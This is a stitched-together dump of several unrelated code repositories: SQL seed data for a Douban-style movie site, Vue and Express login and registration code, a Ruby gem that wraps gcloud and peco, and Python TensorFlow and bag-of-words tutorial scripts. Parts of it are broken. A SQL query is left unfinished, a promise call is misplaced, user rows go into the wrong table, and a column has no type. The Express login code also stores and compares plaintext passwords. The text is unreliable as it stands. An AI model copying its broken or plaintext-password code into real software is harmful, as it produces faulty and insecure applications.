NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2538072547.jpg",
"台仙魔咒",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2529701498.jpg",
"悲伤逆流成河",5.9
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535297332.jpg",
"新灰姑娘",4.2
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535476911.jpg",
"滴答屋",5.5
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535524955.jpg",
"暮光•巴黎",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2536679956.jpg",
"红高粱",8.3
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2533283770.jpg",
"江湖儿女",7.7
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2534554319.jpg",
"雪怪大冒险",7.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2535365481.jpg",
"灵魂契约",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537681630.jpg",
"为你写诗",4.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2534091010.jpg",
"找到你",7.4
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2537871355.jpg",
"阿凡提之奇缘历险",5.2
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2538045543.jpg",
"产科男生",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2536466873.jpg",
"跨越8年的新娘",7.0
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2506351287.jpg",
"养猪场的奇迹",6.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2531326284.jpg",
"宝贝儿",5.5
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2508608826.jpg",
"重金属囧途",8.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2534537200.jpg",
"我要去远方",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2508033801.jpg",
"黑色1847",7.1
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2520978483.jpg",
"麦昆",8.8
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2537054509.jpg",
"我的冤家是条狗",NULL
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/view/photo/m_ratio_poster/public/p2521821456.jpg",
"迪亚曼帝诺",5.6
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/view/photo/m_ratio_poster/public/p2524209517.jpg",
"盛夏",7.7
);
#第一列 热门电影 movie
CREATE TABLE bean_movie(
id INT PRIMARY KEY AUTO_INCREMENT,
img_url VARCHAR(128),
title VARCHAR(64),
score FLOAT
);
#第一列 电视剧 teleplay
CREATE TABLE bean_teleplay(
id INT PRIMARY KEY AUTO_INCREMENT,
img_url VARCHAR(128),
title VARCHAR(64),
score FLOAT
);
#第一列 综艺 variety
CREATE TABLE bean_variety(
id INT PRIMARY KEY AUTO_INCREMENT,
img_url VARCHAR(128),
title VARCHAR(64),
score FLOAT
);
#用户表
CREATE TABLE bean_user(
id INT PRIMARY KEY AUTO_INCREMENT,
headportrait VARCHAR(128),
phone INT,
uname VARCHAR(64),
upwd VARCHAR(24)
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/icon/up52057602-1.jpg",1075938750,"星夜流云",123456
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/icon/up147712190-14.jpg",1075938751,"张小四",123456
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/icon/up37507203-106.jpg",1075938752,"有心打扰",123456
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/icon/up37507203-106.jpg",1075938753,"大聪看电影",123456
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/icon/up37507203-106.jpg",1075938754,"海月夜",123456
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/icon/up1402913-10.jpg",1075938755,"SELVEN",123456
);
INSERT INTO bean_recent VALUES(
NULL,"https://img1.doubanio.com/icon/up50048249-47.jpg",1075938756,"Vi",123456
);
INSERT INTO bean_recent VALUES(
NULL,"https://img3.doubanio.com/icon/up1666383-355.jpg",1075938757,"发条橙",123456
);
#评论
CREATE TABLE bean_comment(
uid PRIMARY KEY AUTO_INCREMENT,
id INT,
headportrait VARCHAR(128),
uname VARCHAR(64),
comments VARCHAR(256),
commenttime DATETIME,
commentscore INT
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up52057602-1.jpg","星夜流云","50/100 这部电影浪费了麦肯吉的纯真,特效设计想象力贫乏、美术指导有型无神,可能唯一优点是催眠效果一流,害得打算在过道狂奔的同场小朋友们集体安静如鸡。女主走入白雪世界的一瞬间让人想起了《纳尼亚传奇》,如果制作者们看过那部还觉得自己的拿得出手,那脸皮也真够厚的。","2018-11-3 10:12:30",6
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up147712190-14.jpg","星夜流云","空洞平淡,开头飞越伦敦的那个镜头惊艳,已经想好可以用在迪士尼乐园的游乐项目里了","2018-11-3 01:12:30",4
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up52057602-1.jpg","星夜流云","除了场面大,女主美之外,没啥好说的。美国佬为了政治正确,动不动就在传统的欧洲童话里硬塞黑人角色,也是醉了。3颗星送给场景、服装和女主。","2018-11-3 10:12:30",6
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up37507203-106.jpg","发条橙","华美精致的服装并无法赋予人物以深度,艳丽唯美的基色也并不能构建剧情的惊艳,根据经典改变的《胡桃夹子和四个王国》虽有着一副好看的皮囊,但这一次的迪士尼却没能在故事上给人带来多少新意,剧情的羸弱老套使电影最终显得既空洞又无趣。","2018-11-1 06:12:30",6
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up37507203-106.jpg","梦里诗书","片尾的芭蕾舞很好看,男舞者的非常大哈哈哈哈","2018-11-1 06:12:30",4
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up1402913-10.jpg","星夜流云","很古典的迪士尼电影,《欢乐满人间》的一次变奏。真正需要被拯救的其实是失去妻子的父亲,克拉拉找到的钥匙打开的也是父亲的心锁。","2018-11-5 10:12:30",8
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img1.doubanio.com/icon/up50048249-47.jpg","星夜流云","2.5 美术上华丽如旧。其实只是毫无野心的乖乖产品,被差评成如此地步也是我见犹怜。","2018-11-3 03:12:30",4
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up1666383-355.jpg","星夜流云","两星半。特意找了一场国配,从小看译制片留下的情结,国配的胡桃夹子对我来说是个加分项,加了起码一颗星。其实也不是一无是处,踩在大齿轮上看现实中放慢的世界,这点子不错啊,可惜走马观花了。接着是整整一小时走马观花的生理隐喻:撸着脐带进入最初的生命国度,两个男国王要么是冻体(性冷淡)要么是同性恋,进入巨型女玩偶裙子底下看到了六个震动幅度不等的跳蛋,老鼠大军SM贯穿全片(它们的女主人爱抽鞭子),以及回到现实后赤果果的恋父……被迪士尼关键时刻借着摩根·弗里曼性丑闻事件当成了鸡肋项目也算很鸡贼了。","2018-11-4 10:12:30",6
);
<file_sep>(function(){
new Vue({
el:"#form",
data:{
uname:"",
upwd:"",
},
methods:{
submit(){
axios.post(
"http://localhost:4000/user/login",
Qs.stringify({
uname:this.uname,
upwd:this.upwd
}).then
)
}},
mounted(){
}
})
})()<file_sep>(function(){
new Vue({
el:"#form",
data:{
uname:"",
upwd:"",
cpwd:"",
email:"",
phone:"",
isuname:false,
isupwd:false,
iscpwd:false,
ispwd:false,
isemail:false,
isphone:false
},methods:{
submit(){
if(true) {
if(this.uname===""){
this.isuname=true;
return;
}else{
this.isuname=false;
}
if(this.upwd===""){
this.isupwd=true;
return;
}else{
this.isupwd=false;
}
if(this.cpwd===""){
this.iscpwd=true;
return;
}else{
this.iscpwd=false;
}
if(this.upwd!=this.cpwd){
this.ispwd = true;
return;
}else{
this.ispwd=false;
}
if(this.email===""){
this.isemail=true;
return;
}else {
this.isemail=false;
}
if(this.phone===""){
this.isphone=true;
return;
} else{
this.isphone=false;
}
axios.post(
"http://localhost:4000/user/register/",
Qs.stringify({
uname:this.uname,
upwd:this.upwd,
email:this.email,
phone:this.phone,
}),
{headers: {'Content-Type': 'application/x-www-form-urlencoded'}}
)
}
}
},
mounted(){
}
})
})()<file_sep>const express = require('express');
const pool = require('../pool.js');//导入连接数据库的模块
//使用路由器
var router = express.Router();
//1.用户注册
router.post('/register',(req,res)=>{
var obj=req.body;
console.log(obj);
//对客户端所传递的数据进行验证
var $uname = obj.uname;
if(!$uname){ // $uname == ''
res.send({code: 401, msg: 'uname required'});
//禁止程序继续执行
return;
}
//对密码验证,邮箱,手机进行验证
var $upwd = obj.upwd;
if(!$upwd){
res.send({code: 402, msg: 'upwd required'});
return;
}
var $email = obj.email
if(!$email) {
res.send({code: 403, msg: 'email required'});
return;
}
var $phone = obj.phone;
if(!$phone){
res.send({code: 404, msg: 'phone required'});
return;
}
//把数据插入到数据库中
var sql = 'INSERT INTO xc_user VALUES(NULL,?,?,?,?,NULL,NULL,NULL)';
pool.query(sql,[$uname,$upwd,$email,$phone],(err,result)=>{
if(err) throw err;
//提示注册成功
res.writeHead(200,{"Content-Type":"application/json;charset=utf-8",
"Access-Control-Allow-Origin":"*"})
console.log(result);
if(result.length>0){
res.write(JSON.stringify({ok:1}))
}else{
res.write(JSON.stringify({ok:0,msg:"密码错误"}))
}
res.end();
});
});
//2。用户登录
router.post('/login',(req,res)=>{
var obj = req.body;
//验证用户名和密码是否为空
var $uname = obj.uname;
if(!$uname){
res.send({code: 401, msg: 'uname required'});
return;
}
var $upwd = obj.upwd;
if(!$upwd){
res.send({code: 402, msg: 'upwd required'});
return;
}
//查询数据库中是否含有这条记录
//同时满足用户名为$uname和密码$upwd
var sql='SELECT * FROM xc_user WHERE uname=? AND upwd=?';
pool.query(sql,[$uname,$upwd],(err,result)=>{
if(err) throw err;
//result 返回结果是数组
//如果数组的长度大于0,说明找到满足条件的记录
//否则数组的长度等于0,说明没有找到满足条件的记录
if(result.length>0){
res.send({code: 200, msg: 'login suc'});
}else{
res.send({code: 301, msg: 'uname or upwd error'});
}
});
});
//导出路由器
module.exports = router;<file_sep>const express=require("express");
const router=express.Router();
const pool=require("../pool");
router.post("./login",(req,res)=>{
var uname = req.body.uname;
var upwd = req.body.upwd;
var sql =
})
module.exports=router;<file_sep># xiecheng
携程
|
492a465fd308153ac62d31e19f6dac5b8b35c9c2
|
[
"JavaScript",
"SQL",
"Markdown"
] | 9 |
JavaScript
|
zhou10759/xiecheng
|
cffcd4f98d4b8a83f19311206e1b0ecd957a2d24
|
9083db861809cf892013f0dd93bf083b4805ee06
|
refs/heads/master
|
<repo_name>kamito/geco<file_sep>/geco.gemspec
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'geco/version'
Gem::Specification.new do |spec|
spec.name = "geco"
spec.version = Geco::VERSION
spec.authors = ["<NAME>"]
spec.email = ["<EMAIL>"]
spec.summary = %q{geco = gcloud + peco: select GCP resources using peco, and run gcloud}
spec.description = %q{geco = gcloud + peco: select GCP resources using peco, and run gcloud}
spec.homepage = "https://github.com/minimum2scp/geco"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_runtime_dependency "thor", "~> 0.19.1"
spec.add_runtime_dependency "text-table", "~> 1.2.4"
spec.add_development_dependency "bundler", "~> 1.7"
spec.add_development_dependency "rake", "~> 10.0"
end
<file_sep>/bin/geco
#! /usr/bin/env ruby
require 'geco'
Geco::Cli.start
<file_sep>/lib/geco.rb
require "geco/version"
require 'json'
require 'open3'
require 'yaml/store'
require 'etc'
require 'singleton'
require 'thor'
require 'text-table'
module Geco
class Cli < Thor
class_option :zsh_widget, :type => :boolean, :default => false, :aliases => ['-z']
option :project, :type => :string, :aliases => ['-p']
desc "ssh", "select vm instance by peco, and run gcloud compute ssh"
long_desc <<-LONG_DESC
execute `gcloud compute instances list`,
and filter the results by `peco`,
and execute or print `gcloud compute ssh`
LONG_DESC
def ssh
vm_instance = transaction{
project = options[:project] || Config.instance.get('core/project')
VmInstanceList.load(project: project).select(multi:false, project:project)
}
if options[:zsh_widget]
puts vm_instance.build_ssh_cmd
else
system vm_instance.build_ssh_cmd
end
rescue => e
if !options[:zsh_widget]
raise e
end
end
desc "project", "select project and run gcloud config set project"
long_desc <<-LONG_DESC
execute `gcloud preview projects list`,
and filter the results by `peco`,
and execute or print `gcloud config set project`
see https://cloud.google.com/sdk/gcloud/reference/preview/
about `gcloud preview ...`
LONG_DESC
def project
project = transaction{ ProjectList.load.select(multi:false) }
if options[:zsh_widget]
puts project.build_config_set_project_cmd
else
system project.build_config_set_project_cmd
end
rescue => e
if !options[:zsh_widget]
raise e
end
end
desc "gencache", "cache all projects and instances"
def gencache
transaction do
puts "loading projects..."
project_list = ProjectList.load(force: true)
puts "found #{project_list.projects.size} projects."
project_list.projects.each do |project|
puts "loading VM instances on project: #{project.title} (#{project.id})"
vm_instance_list = VmInstanceList.load(force:true, project: project.id)
puts "found #{vm_instance_list.instances.size} vm instances"
end
end
end
no_commands do
def transaction
Cache.instance.transaction do
yield
end
end
end
end
## gcloud preview projects list
class Project < Struct.new(:id, :title, :number)
def build_config_set_project_cmd
%Q[gcloud config set project "#{id}"]
end
end
## gcloud preview projects list
class ProjectList < Struct.new(:projects)
def select(multi:false)
selected = Open3.popen3('peco'){|stdin, stdout, stderr, wait_thr|
stdin.puts to_table
stdin.close_write
stdout.readlines
}.map{ |line|
projects.find{|prj| prj.id == line.chomp.gsub(/(^\|\s*|\s*\|$)/, '').split(/\s*\|\s*/).first }
}.reject{|prj|
prj.id == "id" || prj.id =~ /^[+-]+$/
}
if multi
selected
elsif selected.size == 1
selected.first
else
raise "please select 1 Project"
end
end
def to_table
fields = Project.new.members
table = Text::Table.new( :head => fields, :rows => projects.map{|i| fields.map{|f| i.send(f)}} )
end
class << self
def preview_installed?
! (%x[gcloud components list 2>/dev/null | grep -F '| preview '] =~ /Not Installed/)
end
def load(force:false)
if !preview_installed?
abort 'gcloud component "preview" is not installed, please install by `gcloud components update preview`'
end
if force || ! defined?(@@projects)
@@projects = Cache.instance.get_or_set('projects', expire:24*60*60) do
JSON.parse(%x[gcloud preview projects list --format json]).map{|prj|
Project.new(prj['projectId'], prj['title'], prj['projectNumber'])
}
end
end
ProjectList.new(@@projects)
end
end
end
## gcloud compute ssh ...
## gcloud compute instances ...
class VmInstance < Struct.new(:project, :name, :zone, :machine_type, :internal_ip, :external_ip, :status)
def build_ssh_cmd
%Q[gcloud compute --project="#{project}" ssh --zone="#{zone}" "#{name}"]
end
end
## gcloud compute instances ...
class VmInstanceList < Struct.new(:instances)
def select(multi:false, project:false)
selected_instances = Open3.popen3('peco'){|stdin, stdout, stderr, wait_thr|
stdin.puts to_table(with_project: !!project)
stdin.close_write
stdout.readlines
}.map{ |line|
selected = line.chomp.gsub(/(^\|\s*|\s*\|$)/, '').split(/\s*\|\s*/)
instances.find{|i| project ? (i.name == selected[0]) : (i.name == selected[1] && i.project == selected[0]) }
}.reject{|i|
i.name == "name" || i.name =~ /^[+-]+$/
}
if multi
selected_instances
elsif selected_instances.size == 1
selected_instances.first
else
raise "please select 1 VM instance"
end
end
def to_table(with_project:false)
fields = VmInstance.new.members
fields.reject!{|i| i == :project} if with_project
table = Text::Table.new( :head => fields, :rows => instances.map{|i| fields.map{|f| i.send(f)}} )
end
class << self
def load(force:false, project:nil)
if project
if force || ! defined?(@@instances)
@@instances = Cache.instance.get_or_set("instances/#{project}") do
JSON.parse(%x[gcloud compute instances list --project=#{project} --sort-by name --format json]).map{|i|
VmInstance.new(project, i['name'], i['zone'], i['machineType'], i['networkInterfaces'].first['networkIP'], i['networkInterfaces'].first['accessConfigs'].first['natIP'], i['status'])
}
end
end
VmInstanceList.new(@@instances)
else
project_list = ProjectList.load
## TODO: refactoring
@@instances = project_list.projects.map{|project|
Cache.instance.get_or_set("instances/#{project.id}") do
VmInstanceList.load(force:force, project:project.id)
Cache.instance.get("instances/#{project.id}")
end
}.flatten
VmInstanceList.new(@@instances)
end
end
end
end
## gcloud config ...
class Config
include Singleton
def initialize
@config = JSON.parse %x[gcloud config list --all --format json]
end
def get(arg)
sec, key = arg.split('/', 2)
@config[sec][key]
end
end
class Cache
include Singleton
def initialize(path:"/tmp/gcloud-cache.#{Etc.getlogin}.yaml")
@db = YAML::Store.new(path)
end
def transaction
@in_transaction = true
ret = nil
@db.transaction do
ret = yield
end
ensure
@in_transaction = false
ret
end
def get_or_set(key, expire:24*60*60, &block)
get(key) || set(key, block.call, expire:expire)
end
def set(key, value, expire:24*60*60)
if @in_transaction
@db[key] = {value: value, expire: Time.now+expire}; value
else
self.transaction{ self.set(key, value, expire:expire) }
end
end
def get(key)
if @in_transaction
@db[key] && @db[key][:expire] > Time.now ? @db[key][:value] : nil
else
self.transaction{ self.get(key) }
end
end
end
end
<file_sep>/README.md
# Geco
[](LICENSE.txt)
[](http://badge.fury.io/rb/geco)
[](https://codeclimate.com/github/minimum2scp/geco)
geco = gcloud + peco: select GCP resource using peco, and run gcloud
## Installation
Add this line to your application's Gemfile:
```ruby
gem 'geco'
```
And then execute:
$ bundle
Or install it yourself as:
$ gem install geco
## Usage
TODO: Write usage instructions here
## Contributing
1. Fork it ( https://github.com/minimum2scp/geco/fork )
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create a new Pull Request
|
ea5004dffddd2ffdc68f847afddf631bb13f24fa
|
[
"Markdown",
"Ruby"
] | 4 |
Ruby
|
kamito/geco
|
7127c4bb8b789cdbe0bfce4c369e1e3bbeddcbc0
|
07430c81fbe3c56ac9c8d3bcf7cca69129853675
|
refs/heads/master
|
<file_sep>class Paperball{
constructor(x,y,radius){
//var options={
//}
this.body=Bodies.circle(x,y,radius);
this.radius=radius;
this.image=loadImage("paper.png");
World.add(world,this.body);
}
display(){
var pos=this.body.position;
console.log(this.body);
imageMode(CENTER);
image(this.image, pos.x,pos.y,this.radius,this.radius);
}
}<file_sep>class Catapult{
constructor(bodyA,pointB){
var options={
bodyA:bodyA,
pointB:pointB,
stiffnes:0.04,
length:1
}
this.catapult= Constraint.create(options);
this.pointB=pointB;
}
fly(){
this.catapult.bodyA=null;
}
display(){
if(this.catapult.bodyA){
var pointA= this.catapult.bodyA.position;
var pointB= this.pointB;
line(pointA.x,pointA.y,pointB.x,pointB.y);
}
}
}
|
6202a6f6015bce1983ef6ecf26455f8711e46cbe
|
[
"JavaScript"
] | 2 |
JavaScript
|
GurmehrBindra/Project28
|
6f5d60dffbe0f2e0aaa3aa131d5cea69f8e5d6ca
|
8605c69aba079eae9cc697fce9c7aa2c22e6a648
|
refs/heads/master
|
<file_sep>function funkcija4() {
var x=document.getElementById("MojDiv");
if (x.style.visibility === "unset") {
x.style.visibility = "hidden";
}
else {
x.style.display = "hidden";
}
}
function funckija5() {
var y=document.getElementById("MojDiv");
if (y.style.visibility === "hidden"){
y.style.visibility = "unset";
}
else{
y.style.visibility = "unset";
}
}
|
ef635318afa8d84c4de20d9a420468b3b9e54889
|
[
"JavaScript"
] | 1 |
JavaScript
|
fransokolic1/Java_Script-DOM
|
58265b4ed2bea26e5cd164b1abb0f2bb88f59502
|
d84b5f285ed08d07dee3d56ee340674645c35f79
|
refs/heads/master
|
<repo_name>paulodiff/machine-learning<file_sep>/Activation-Functions.py
# Display of Activation Functions and softmax
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
# helper for variable defs
def init_weights(shape, name):
return tf.Variable(tf.random_normal(shape, stddev=0.01), name=name)
# Funzione da minimizzare
# y = 0.1 * x + 0.3
num_points = 10
# STEP 1 - input data build
vectors_set = []
for i in range(num_points):
x1 = np.random.normal(0.0, 0.55)
y1 = x1 * 0.1 + 0.3 + np.random.normal(0.0, 0.03)
vectors_set.append([x1, y1])
x_data = [v[0] for v in vectors_set]
y_data = [v[1] for v in vectors_set]
print('x_data:------------------------------------------------')
print(x_data)
print('y_data:------------------------------------------------')
print(y_data)
# STEP 2 - create input and placeholders
x_1 = tf.placeholder(tf.float32, None)
W = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
b = tf.Variable(tf.zeros([1]))
#STEP 3 - model
y = W * x_data + b
xAll = tf.maximum(x_data, x_data)
xL = tf.lin_space(-6.0,6.0,1000)
ySigmoid = tf.nn.sigmoid(xL)
yRELU = tf.nn.relu(xL)
yELU = tf.nn.elu(xL)
yTANH = tf.nn.tanh(xL)
#STEP 4 - cost function
# mean squared error helps us to move forward step by step.
# cost = tf.reduce_mean(tf.square(y - y_data))
# train_op = tf.train.RMSPropOptimizer(0.001, 0.9).minimize(cost)
# train_op = tf.train.GradientDescentOptimizer(0.1).minimize(cost)
# tf.scalar_summary("cost", cost)
# Initializing the variables
init = tf.global_variables_initializer()
#Step 9 Create a session - START
with tf.Session() as sess:
sess.run(init)
print(xL)
fig1 = plt.figure()
# N,M,I row col index
ax1 = fig1.add_subplot(331)
ax2 = fig1.add_subplot(332)
ax3 = fig1.add_subplot(333)
ax4 = fig1.add_subplot(334)
yS,yR,yE,yT, xL1 = sess.run([ySigmoid, yRELU, yELU, yTANH, xL], feed_dict={x_1 : xL.eval()})
# print(step, sess.run(W), sess.run(b), sess.run(cost))
print(yS)
print(xL1)
ax1.plot(xL1, yS, 'r')
ax1.set_title('lll')
ax2.plot(xL1, yR, 'r')
ax3.plot(xL1, yE, 'g')
ax4.set_title('lll')
ax4.plot(xL1, yT, 'g')
# ax1.plot(x_data, sess.run(W) * x_data + sess.run(b))
# ax1.plot(x_data, w1 * x_data + b1)
# ax2.plot(x_data, yS)
# ax1.set_xlabel('x step: {0} cost: {1}'.format(step,c1))
# plt.pause(5)
plt.legend()
plt.show()
<file_sep>/tf-COMPLEMENTARY-COLOR.py
# idea https://deeplearnjs.org/demos/complementary-color-prediction/complementary_color_prediction.html
# from https://www.tensorflow.org/get_started/estimator
# regression DNNRegression https://github.com/tensorflow/tensorflow/tree/master/tensorflow/examples/learn
# Complementary Color Prediction
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import urllib
import numpy as np
import tensorflow as tf
print("Tensorflow version: " + tf.__version__)
# Data sets
C_COLOR_TRAINING = "tf-c-color-training.csv"
C_COLOR_TEST = "tf-c-color-test.csv"
# for TensorBoard
MODEL_DIR = "c:/ai/nn/tmp/model/complementarycolor"
print("START OPERAZIONI")
# If the training and test sets aren't stored locally, download them.
#if not os.path.exists(IRIS_TRAINING):
# raw = urllib.urlopen(IRIS_TRAINING_URL).read()
# with open(IRIS_TRAINING, "w") as f:
# f.write(raw)
#if not os.path.exists(IRIS_TEST):
# raw = urllib.urlopen(IRIS_TEST_URL).read()
# with open(IRIS_TEST, "w") as f:
# f.write(raw)
print('Caricamento dataset, specifica il tipo delle FEATURES ')
# Load datasets.
training_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=C_COLOR_TRAINING,
features_dtype=np.int,
target_dtype=np.int)
test_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=C_COLOR_TRAINING,
features_dtype=np.int,
target_dtype=np.int)
print('Stampa di alcuni valori di TRANING')
print(training_set.data)
print('Stampa di alcuni valori di TEST')
print(test_set.data)
print('Impostazione delle colonne')
# Specify that all features have real-value data
feature_columns = [tf.feature_column.numeric_column("x", shape=[4])]
print('Inizializzazione del classificatore')
# Build 3 layer DNN with 10, 20, 10 units respectively.
classifier = tf.estimator.DNNClassifier(feature_columns=feature_columns,
hidden_units=[10, 20, 10],
n_classes=3,
# optimizer default Adagrad
# activation_fn default relu
# dropout default none
model_dir=MODEL_DIR)
# Define the training inputs
print('Definizione della funzione di input per il training')
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": np.array(training_set.data)},
y=np.array(training_set.target),
num_epochs=None,
shuffle=True)
print('Training ....')
# Train model.
classifier.train(input_fn=train_input_fn, steps=2000)
print('Definizione della funzione di input per il test')
# Define the test inputs
test_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": np.array(test_set.data)},
y=np.array(test_set.target),
num_epochs=1,
shuffle=False)
print('Definizione dell"accuratezza del dato usando l"insieme di test')
# Evaluate accuracy.
accuracy_score = classifier.evaluate(input_fn=test_input_fn)["accuracy"]
print("\nTest Accuracy: {0:f}\n".format(accuracy_score))
print('Definizione di alcuni campioni per la prediction')
# Classify two new flower samples.
new_samples = np.array(
[[6.4, 3.2, 4.5, 1.5],
[5.8, 3.1, 5.0, 1.7],
[6.4, 2.8, 5.6, 2.2],
[4.9, 3.1, 1.5, 0.1]
], dtype=np.float32)
predict_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": new_samples},
num_epochs=1,
shuffle=False)
pcl = classifier.predict(input_fn=predict_input_fn)
print('Risultato inferenza')
print(pcl)
pc = list(pcl)
print('Risultato inferenza con list()')
print(pc)
print('Stampa lista ..')
for p in pc:
print(p["classes"])
print('Risultato inferenza usando Classes ...')
predicted_classes = [p["classes"] for p in pc]
print(predicted_classes)
print("New Samples, Class Predictions: {}\n".format(predicted_classes))
print('OPERAZIONI COMPLETATE')<file_sep>/word2vect-kaggle.py
# https://www.kaggle.com/c/word2vec-nlp-tutorial/details/part-1-for-beginners-bag-of-words
# Import the pandas package, then use the "read_csv" function to read
# the labeled training data
import pandas as pd
train = pd.read_csv("./labeledTrainData.tsv", header=0, delimiter="\t", quoting=3)
print(train.shape)
# Import BeautifulSoup into your workspace
from bs4 import BeautifulSoup
# Initialize the BeautifulSoup object on a single movie review
example1 = BeautifulSoup(train["review"][0], "html.parser")
# Print the raw review and then the output of get_text(), for
# comparison
print(train["review"][0])
print(example1.get_text())
import re
# Use regular expressions to do a find-and-replace
letters_only = re.sub("[^a-zA-Z]", # The pattern to search for
" ", # The pattern to replace it with
example1.get_text() ) # The text to search
print(letters_only)
import nltk
# nltk.download() # Download text data sets, including stop words
from nltk.corpus import stopwords # Import the stop word list
print(stopwords.words("english"))
def review_to_words( raw_review ):
# Function to convert a raw review to a string of words
# The input is a single string (a raw movie review), and
# the output is a single string (a preprocessed movie review)
#
# 1. Remove HTML
review_text = BeautifulSoup(raw_review).get_text()
#
# 2. Remove non-letters
letters_only = re.sub("[^a-zA-Z]", " ", review_text)
#
# 3. Convert to lower case, split into individual words
words = letters_only.lower().split()
#
# 4. In Python, searching a set is much faster than searching
# a list, so convert the stop words to a set
stops = set(stopwords.words("english"))
#
# 5. Remove stop words
meaningful_words = [w for w in words if not w in stops]
#
# 6. Join the words back into one string separated by space,
# and return the result.
return( " ".join( meaningful_words ))
clean_review = review_to_words( train["review"][0] )
print(clean_review)
# Get the number of reviews based on the dataframe column size
num_reviews = train["review"].size
# Initialize an empty list to hold the clean reviews
clean_train_reviews = []
# Loop over each review; create an index i that goes from 0 to the length
# of the movie review list
#for i in range( 0, num_reviews ):
# # Call our function for each one, and add the result to the list of
# # clean reviews
# clean_train_reviews.append( review_to_words( train["review"][i] ) )
print("Cleaning and parsing the training set movie reviews...\n")
clean_train_reviews = []
for i in range( 0, num_reviews ):
# If the index is evenly divisible by 1000, print a message
if( (i+1)%1000 == 0 ):
print("Review %d of %d\n" % ( i+1, num_reviews ))
clean_train_reviews.append( review_to_words( train["review"][i] ))
print("Creating the bag of words...\n")
from sklearn.feature_extraction.text import CountVectorizer
# Initialize the "CountVectorizer" object, which is scikit-learn's
# bag of words tool.
vectorizer = CountVectorizer(analyzer = "word", \
tokenizer = None, \
preprocessor = None, \
stop_words = None, \
max_features = 5000)
# fit_transform() does two functions: First, it fits the model
# and learns the vocabulary; second, it transforms our training data
# into feature vectors. The input to fit_transform should be a list of
# strings.
train_data_features = vectorizer.fit_transform(clean_train_reviews)
# Numpy arrays are easy to work with, so convert the result to an
# array
train_data_features = train_data_features.toarray()
# Take a look at the words in the vocabulary
vocab = vectorizer.get_feature_names()
print(vocab)
import numpy as np
# Sum up the counts of each vocabulary word
dist = np.sum(train_data_features, axis=0)
# For each, print the vocabulary word and the number of times it
# appears in the training set
for tag, count in zip(vocab, dist):
print(count, tag)
print("Training the random forest...")
from sklearn.ensemble import RandomForestClassifier
# Initialize a Random Forest classifier with 100 trees
